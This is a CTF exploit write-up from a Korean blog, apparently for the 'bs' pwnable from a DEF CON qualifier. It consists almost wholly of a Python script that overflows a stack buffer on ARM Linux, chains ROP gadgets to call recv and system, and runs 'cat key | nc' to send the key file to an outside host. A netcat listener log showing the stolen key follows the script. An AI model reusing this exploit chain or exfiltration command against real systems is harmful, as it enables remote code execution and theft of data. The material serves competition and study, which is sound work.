Category : Pwnables (0x41414141)


bs

 

Summary : uninitialized variable, stack based buffer overflow, ROP on ARM linux 


Exploit

#!/usr/bin/python

# recv(4, buf, len(cmd)) -> system(buf)


from socket import *

from struct import pack

import time, sys


p = lambda x: pack("<L", x)


HOST = "bitterswallow.shallweplayaga.me"

PORT = 6492


send_data = 0x0001D9FC

freespace = 0x00027628

system = 0xb6e5cbd8


command = "cat key | nc bean.b10s.org 31337"

recvdata = 0x0001DC04


"""

.text:0001E3C8                 MOV     R0, R6

.text:0001E3CC                 MOV     R1, R7

.text:0001E3D0                 MOV     R2, R8

.text:0001E3D4                 ADD     R4, R4, #1

.text:0001E3D8                 BLX     R3

.text:0001E3DC                 CMP     R4, R10

.text:0001E3E0                 BNE     loc_1E3C4

.text:0001E3E4                 LDMFD   SP!, {R3-R8,R10,PC}

"""



payload = ""

payload += "a"*0x444


payload += p(0x0001E3E4) # .text:0001E3E4 F8 85 BD E8 / LDMFD SP!,{R3-R8,R10,PC}

###########################

payload += p(0x0001E3F0) # .text:0001E3F0 1E FF 2F E1 / BX LR

payload += p(0x00000000) * 2

payload += p(0x00000004) # r0

payload += p(freespace) # r1

payload += p(len(command)) # r2

payload += p(0x00000001)

###########################

payload += p(0x0001E3C8)

###########################

payload += p(0x11111111)*7

###########################

payload += p(recvdata)

###########################

#payload += p(0x0001E3E4) # .text:0001E3E4 F8 85 BD E8 LDMFD SP!,{R3-R8,R10,PC}

###########################

payload += p(0x0001E3F0) # .text:0001E3F0 1E FF 2F E1 BX LR

payload += p(0x00000000)*2

payload += p(freespace) # r0

payload += p(0x00000001)*3

###########################

payload += p(0x0001E3C8)

##########################

payload += p(0x11111111)*7

##########################

payload += p(system)

##########################


s = socket(AF_INET, SOCK_STREAM)

s.connect((HOST, PORT))

time.sleep(0.5)


s.recv(1024)

s.send("y")

s.send("\x32")

s.send("\x01\x00")

s.send("b")

time.sleep(0.5)


s.recv(1024)

s.send("y")

time.sleep(0.5)


s.send("\x3f")

s.send(p(len(payload))[0:2])

s.send(payload)

time.sleep(0.5)


s.send("y")

time.sleep(0.5)


s.recv(1024)


s.send(command)

time.sleep(0.5)


s.close()



root@ubuntu:~/pwn100# ./exploit.py 


-----------------------------------------------------------


root@ubuntu:~# nc -lv 31337

Connection from 131.247.27.199 port 31337 [tcp/*] accepted

The key is: sometimes you just have to suck it up 


저작자표시 (새창열림)

'CTF' 카테고리의 다른 글

Secuinside 2012 Quals Pwnable Chal Exploits  (0) 2012.10.07
Secuinside 2012 Quals - Classico (Exploit only)  (0) 2012.10.07
Secuinside 2012 Quals - Roadie (Exploit only)  (0) 2012.10.07
Secuinside 2012 Quals - Tribute (Exploit only)  (0) 2012.10.07
Secuinside 2012 Quals - Dethstarr (Exploit only)  (0) 2012.10.07

티스토리툴바